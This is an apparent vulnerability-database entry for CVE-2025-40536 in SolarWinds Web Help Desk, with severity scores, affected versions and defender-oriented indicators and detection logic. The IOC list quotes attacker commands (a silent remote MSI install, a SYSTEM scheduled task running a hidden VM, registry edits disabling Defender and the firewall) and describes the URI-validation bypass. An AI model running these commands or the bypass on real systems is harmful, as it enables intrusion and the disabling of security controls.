cbcvebase.
CVE-2025-40536
published 2026-01-28

Priority: P1 (97)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2026-02-15
Exploited in the wild
EPSS: 81.62% (99.6th percentile)
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.

Affected (2 ranges)

Vendor     | Product       | Version range | Fixed in
solarwinds | web_help_desk | < 2026.1      | 2026.1
solarwinds | web_help_desk |               |

Detection & IOCs (extracted from sources)

url: hxxps://files.catbox[.]moe/tmp9fc.msi
url: hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
url: hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
domain: vdfccjpnedujhrzscjtq.supabase[.]co
domain: auth.qgtxtebl.workers[.]dev
domain: v2-api.mooo[.]com
path: C:\ProgramData\Microsoft\code.exe
path: C:\Program Files\Velociraptor\Velociraptor.exe
path: C:\Program Files\WebHelpDesk\version.txt
command: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
command: SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
command: reg add "HKLM\SYSTEM\CurrentControlSet\Services\mpssvc" /v Start /t REG_DWORD /d 4 /f
command: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
command: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
command: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealTimeMonitoring /t REG_DWORD /d 1 /f
command: net group "domain computers" /do
registry: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOAVProtection
registry: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\SpynetReporting
port: 22022
url: {{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa
other: http.favicon.hash:1895809524
other: TPMProfiler
other: esmahyft@proton[.]me
sigma:
any where host.os.type == "windows" and (
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
  • Initial exploitation chain: wrapper.exe spawns java.exe which spawns cmd.exe under the WHD install path. Alert on cmd.exe, powershell.exe, or rundll32.exe with a parent matching C:\Program Files\WebHelpDesk\*\java*.exe.
  • Velociraptor version 0.73.4 (outdated, with a privilege escalation vulnerability) was used as attacker C2. Detect Velociraptor service running with client.config.yaml pointing to Cloudflare Workers or mooo.com domains.
  • C2 failover mechanism: monitor for PowerShell scripts that probe /reader endpoint on v2-api.mooo[.]com and rewrite C:\Program Files\Velociraptor\client.config.yaml, then restart the Velociraptor service.
  • Detect DLL loads from UNC/network paths (\Device\Mup\*) or unsigned DLLs loaded by java.exe under the WebHelpDesk install directory as an indicator of exploitation.
  • The CVE-2025-40536 bypass involves including '/ajax/' in a query parameter to circumvent URI validation; switching from '/ajax/' to '/wo/' endpoints bypasses payload sanitization. Monitor WHD web logs for requests to /wo/ endpoints with badparam=/ajax/ query strings.
  • Shodan fingerprint for exposed SolarWinds Web Help Desk instances: http.favicon.hash:1895809524. Use for asset discovery and attack surface monitoring.
  • Nuclei version check: WHD versions reporting build token < 12.8.8.2585 (via regex \?v=([0-9]+_[0-9]+_[0-9]+_[0-9]+) in page body) are vulnerable to CVE-2025-40536.
  • Attacker used an Elastic Cloud free trial on GCP as a victim-data exfiltration backend (SIEM-as-C2). Investigate PowerShell executing Get-ComputerInfo and shipping results to external Elasticsearch endpoints.
  • CVE-2025-40536 is a security control bypass (CSRF whitelist bypass) that is chained with CVE-2025-40551 (JNDI deserialization RCE) to achieve unauthenticated RCE. Neither CVE alone is sufficient for full exploitation in the chained attack path.
  • Elastic Security Labs did not observe direct telemetry for this activity at time of publication; detections are based on third-party reporting (Microsoft, Huntress, Cisco Talos).

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 8.1 HIGH
cisa: 9.8 CRITICAL